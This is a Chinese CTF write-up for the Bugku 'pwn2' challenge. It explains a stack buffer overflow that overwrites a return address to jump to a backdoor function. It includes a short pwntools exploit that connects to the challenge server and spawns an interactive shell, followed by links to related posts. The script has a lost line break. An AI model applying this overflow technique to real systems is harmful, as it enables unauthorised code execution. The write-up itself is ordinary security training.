Bugku pwn2
pwn2
题目
chmod +x pwn2
这里都关闭了,栈上可执行!
这个程序里面直接留了后门get_shell_
思路,输入的数据超过0x30栈空间大小,将get_shell_地址覆盖调用main函数的返回地址即可,
即b'm' * (0x30 + 8) + p64(0x400751)
,这里加上8是因为push了rbp,即8个字节大小
exp
from pwn import *p = remote('114.116.54.89', '10003')
payload = b'a' * (0x30 + 8) + p64(0x400751)
p.recvuntil('say something')
p.sendline(payload)
p.interactive()
Bugku pwn2相关推荐
- [Bugku CTF——Pwn] pwn2
[Bugku CTF--Pwn] pwn2 题目地址:https://ctf.bugku.com/ 额,好久不写这么简单的题目了 利用栈溢出修改返回地址就好, 如果不会就去看看什么是栈溢出 explo ...
- [BUGKU] [PWN] PWN5
[BUGKU] [PWN] PWN5 先下载文件,拉入UBUNTU,checksec检查一下 checksec human 架构是amd64,并开启了NX(堆栈可执行,16进制地址后六位不变,其余运行 ...
- php 伪协议 lfi,php://伪协议(I/O)总能给你惊喜——Bugku CTF-welcome to bugkuctf
今天一大早BugkuCTF 的welcome to bugkuctf 就给了我一发暴击:完全不会啊...光看源码就发现不知道怎么处理了,于是转向writeup求助.结果发现这是一道非常有营养的题目,赶 ...
- BUGKU 密码题:这不是摩斯密码
BUGKU 密码题:这不是摩斯密码 这不是摩斯密码 打开文件,发现如下符号: 可以发现,符号都是由> < + - . , [ ]来组成.那么显然,这个是Brainfuck加密.这里推荐一个 ...
- Bugku——Web——矛盾
题目链接:http://ctf.bugku.com/challenges#矛盾:http://123.206.87.240:8002/get/index1.php 解题步骤: 1.is_numeric ...
- 输入密码查看flag(详解)——Bugku
刚刚做了bugku的题目,现在整理一下 写出解题思路,希望能够帮助到那些需要帮助的人 所有的wp都是以一题一篇的形式写出 主要是为了能够让读者更好的阅读以及查找, 希望你们不要责怪!!共勉!!! Ch ...
- 点击一百万次(详解)——bugku
刚刚做了bugku的题目,现在整理一下 写出解题思路,希望能够帮助到那些需要帮助的人 所有的wp都是以一题一篇的形式写出 主要是为了能够让读者更好的阅读以及查找, 希望你们不要责怪!!共勉!!! Ch ...
- bugku——web 做题记录
Table of Contents 2,秋名山车神: 3,速度要快 4 welcome to the bugkuctf 1,login1(sql约束攻击) sql约束攻击: 2,过狗一句话 3,细心 ...
- bugku ——加密 做题记录
目录 1,滴答-滴 2,聪明的小羊 3,ok 4这不是摩斯密码 5,easy_crypto 6,简单加密 7,散乱的密文 8 凯撒部长的奖励 9,一段base64 10,.!? 11,+[]-(Bra ...
最新文章
- jieba词性说明字典
- 统一代码段与非一致代码段
- pandas对象保存到mysql出错提示“BLOB/TEXT column used in key specification without a key length”解决办法
- pytorch Embedding模块,自动为文本加载预训练的embedding
- 大型web工程的session管理器构想
- docker_5 DockerFile
- 服务端如何防止订单重复支付?
- 分布式系统工具箱 Spring Cloud 概览
- Linux 用户的 3 个命令行小技巧
- 【回归预测】基于matlab Logistic混沌映射改进的麻雀搜索算法优化BP神经网络回归预测【含Matlab源码 1552期】
- Class字节码文件结构总结
- ANSYS12.0安装教程
- 基于librtmp的推流实现
- word论文排版和写作02:插入算法的伪代码
- 今日说“法”:FPGA芯片如何选型?
- python利用浏览器执行js_浏览器如何执行JS
- vue+springboot实现调用本地摄像头拍照上传后端使用百度ocr识别身份证信息
- 【To Be Continued】一些有意思的计算机小问题
- 台式计算机一小时功率,电脑电源功率如何选?电脑1小时能耗多少电?
- hadoop编程:分析CSDN注册邮箱分布情况
热门文章
- html中select标签默认选择,HTML中的select标签如何设置默认选中的选项
- oracle power 函数
- 嵌入式入门需要学什么
- linux修改文件名为gbk,Linux下文件名编码转换-Convmv
- 百度指数数据抓取Python+selenuim+OpenCV(三)
- 将Kali Linux 2020.1a 版本英文版改中文版的方法(直接安装中文版后乱码)
- mysql (errcode 2)_“File '/usr/share/mysql/charsets/?.conf' not found (Errcode: 2)”,出错急救!...
- Redis 主从搭建
- byte转int出现负数的情况
- TCP/ip实现客户端并发登录